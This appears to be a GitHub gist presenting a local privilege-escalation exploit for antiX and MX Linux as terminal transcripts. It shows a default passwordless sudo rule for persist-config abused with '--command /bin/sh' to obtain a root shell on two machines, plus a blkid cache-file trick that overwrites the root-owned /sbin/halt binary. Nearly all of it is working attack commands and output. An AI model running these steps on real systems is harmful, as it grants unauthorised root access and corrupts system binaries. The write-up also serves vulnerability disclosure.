LPE exploit of AntiX/MX Linux
# OS version | |
m4x@antix1:~ | |
$ cat /etc/issue | |
Welcome to antiX. Powered by Debian. | |
m4x@antix1:~ | |
$ uname -a | |
Linux antix1 4.9.193-antix.1-amd64-smp #1 SMP PREEMPT Fri Sep 20 20:30:09 BST 2019 x86_64 GNU/Linux | |
m4x@antix1:~ | |
$ lsb_release -a | |
No LSB modules are available. | |
Distributor ID: Debian | |
Description: Debian GNU/Linux 10 (buster) | |
Release: 10 | |
Codename: buster | |
# exploit | |
m4x@antix1:~ | |
$ id | |
uid=1000(m4x) gid=1000(m4x) groups=1000(m4x),7(lp),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),109(netdev),112(lpadmin),113(scanner),114(vboxsf) | |
m4x@antix1:~ | |
$ sudo -l | |
Matching Defaults entries for m4x on antix1: | |
env_reset, mail_badpass, | |
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, | |
!requiretty, !tty_tickets | |
Runas and Command-specific defaults for m4x: | |
Defaults!/usr/local/bin/menu_manager.sh env_keep+=HOME | |
User m4x may run the following commands on antix1: | |
(ALL : ALL) ALL | |
(root) NOPASSWD: /sbin/halt | |
(root) NOPASSWD: /sbin/poweroff | |
(root) NOPASSWD: /sbin/reboot | |
(root) NOPASSWD: /sbin/blkid | |
(root) NOPASSWD: /sbin/fdisk.distrib | |
(root) NOPASSWD: /usr/bin/ceni | |
(root) NOPASSWD: /usr/local/bin/persist-config <==== bug here | |
(root) NOPASSWD: /usr/local/bin/persist-save | |
(root) NOPASSWD: /usr/sbin/minstall | |
(root) NOPASSWD: /usr/local/bin/antixsources.sh | |
(root) NOPASSWD: /usr/local/bin/connectshares.sh | |
(root) NOPASSWD: /usr/local/bin/disconnectshares.sh | |
(root) NOPASSWD: /bin/chvt | |
(root) NOPASSWD: /usr/local/bin/menu_manager.sh | |
(root) NOPASSWD: /usr/sbin/pm-hibernate | |
(root) NOPASSWD: /usr/sbin/pm-suspend | |
(root) NOPASSWD: /usr/local/bin/update-default-desktop | |
m4x@antix1:~ | |
$ sudo /usr/local/bin/persist-config --command /bin/sh | |
# id | |
uid=0(root) gid=0(root) groups=0(root) | |
# |
m4x@mx:~/Desktop | |
$ sudo -l | |
Matching Defaults entries for m4x on mx: | |
env_reset, mail_badpass, | |
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !requiretty, | |
!tty_tickets | |
Runas and Command-specific defaults for m4x: | |
Defaults!/usr/local/bin/menu_manager.sh env_keep+=HOME | |
User m4x may run the following commands on mx: | |
(ALL : ALL) ALL | |
(root) NOPASSWD: /sbin/halt | |
(root) NOPASSWD: /sbin/poweroff | |
(root) NOPASSWD: /sbin/reboot | |
(root) NOPASSWD: /sbin/blkid | |
(root) NOPASSWD: /sbin/fdisk.distrib | |
(root) NOPASSWD: /usr/bin/ceni | |
(root) NOPASSWD: /usr/local/bin/persist-config | |
(root) NOPASSWD: /usr/local/bin/persist-save | |
(root) NOPASSWD: /usr/sbin/minstall | |
(root) NOPASSWD: /usr/local/bin/antixsources.sh | |
(root) NOPASSWD: /usr/local/bin/connectshares.sh | |
(root) NOPASSWD: /usr/local/bin/disconnectshares.sh | |
(root) NOPASSWD: /bin/chvt | |
(root) NOPASSWD: /usr/local/bin/menu_manager.sh | |
(root) NOPASSWD: /usr/sbin/pm-hibernate | |
(root) NOPASSWD: /usr/sbin/pm-suspend | |
(root) NOPASSWD: /usr/local/bin/update-default-desktop | |
(root) NOPASSWD: /usr/lib/mx-tweak/backlight-brightness | |
m4x@mx:~/Desktop | |
$ ls -l /sbin/halt | |
-rwxr-xr-x 1 root root 18888 Feb 14 2019 /sbin/halt | |
m4x@mx:~/Desktop | |
$ sudo /sbin/blkid -c /sbin/halt | |
/dev/sr0: UUID="2019-06-13-05-24-38-00" LABEL="VMware Tools" TYPE="iso9660" | |
/dev/sda1: LABEL="rootMX19" UUID="b347b443-e474-4afd-97bc-bc91f180e7c5" TYPE="ext4" PARTUUID="b46d7286-01" | |
/dev/sda2: LABEL="swapMX" UUID="9933b310-575c-4caa-a335-79b165ee7d89" TYPE="swap" PARTUUID="b46d7286-02" | |
m4x@mx:~/Desktop | |
$ sudo cat /sbin/halt | |
<device DEVNO="0x0b00" TIME="1584329636.32005" UUID="2019-06-13-05-24-38-00" LABEL="VMware Tools" TYPE="iso9660">/dev/sr0</device> | |
<device DEVNO="0x0801" TIME="1584329636.35739" LABEL="rootMX19" UUID="b347b443-e474-4afd-97bc-bc91f180e7c5" TYPE="ext4" PARTUUID="b46d7286-01">/dev/sda1</device> | |
<device DEVNO="0x0802" TIME="1584329636.38616" LABEL="swapMX" UUID="9933b310-575c-4caa-a335-79b165ee7d89" TYPE="swap" PARTUUID="b46d7286-02">/dev/sda2</device> | |
# OS version | |
m4x@M4x-PC:~ | |
$ screenfetch | |
_,met$$$$$gg. m4x@M4x-PC | |
,g$$$$$$$$$$$$$$$P. OS: Debian 10 buster | |
,g$$P"" """Y$$.". Kernel: x86_64 Linux 4.19.0-6-amd64 | |
,$$P' `$$$. Uptime: 25m | |
',$$P ,ggs. `$$b: Packages: 1970 | |
`d$$' ,$P"' . $$$ Shell: bash 5.0.3 | |
$$P d$' , $$P Resolution: 3838x1819 | |
$$: $$. - ,d$$' DE: XFCE | |
$$\; Y$b._ _,d$P' WM: Xfwm4 | |
Y$$. `.`"Y$$$$P"' WM Theme: Arc-Dark | |
`$$b "-.__ GTK Theme: Greybird-mx [GTK2] | |
`Y$$ Icon Theme: Papirus | |
`Y$$. Font: Noto Sans 10.5 | |
`$$b. CPU: Intel Core i7-8650U @ 2.112GHz | |
`Y$$b. GPU: llvmpipe (LLVM 7.0, 256 bits) | |
`"Y$b._ RAM: 832MiB / 1970MiB | |
`"""" | |
m4x@M4x-PC:~ | |
$ cat /etc/issue | |
Welcome to MX Linux! Powered by Debian. | |
# exploit | |
m4x@M4x-PC:~ | |
$ id | |
uid=1000(m4x) gid=1000(m4x) groups=1000(m4x),7(lp),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),109(netdev),111(lpadmin),118(scanner),125(vboxsf) | |
m4x@M4x-PC:~ | |
$ sudo -l | |
Matching Defaults entries for m4x on M4x-PC: | |
env_reset, mail_badpass, | |
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !requiretty, | |
!tty_tickets | |
Runas and Command-specific defaults for m4x: | |
Defaults!/usr/local/bin/menu_manager.sh env_keep+=HOME | |
User m4x may run the following commands on M4x-PC: | |
(ALL : ALL) ALL | |
(root) NOPASSWD: /sbin/halt | |
(root) NOPASSWD: /sbin/poweroff | |
(root) NOPASSWD: /sbin/reboot | |
(root) NOPASSWD: /sbin/blkid | |
(root) NOPASSWD: /sbin/fdisk.distrib | |
(root) NOPASSWD: /usr/bin/ceni | |
(root) NOPASSWD: /usr/local/bin/persist-config <======= bug here | |
(root) NOPASSWD: /usr/local/bin/persist-save | |
(root) NOPASSWD: /usr/sbin/minstall | |
(root) NOPASSWD: /usr/local/bin/antixsources.sh | |
(root) NOPASSWD: /usr/local/bin/connectshares.sh | |
(root) NOPASSWD: /usr/local/bin/disconnectshares.sh | |
(root) NOPASSWD: /bin/chvt | |
(root) NOPASSWD: /usr/local/bin/menu_manager.sh | |
(root) NOPASSWD: /usr/sbin/pm-hibernate | |
(root) NOPASSWD: /usr/sbin/pm-suspend | |
(root) NOPASSWD: /usr/local/bin/update-default-desktop | |
m4x@M4x-PC:~ | |
$ sudo /usr/local/bin/persist-config --command /bin/sh | |
# id | |
uid=0(root) gid=0(root) groups=0(root) | |
# |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment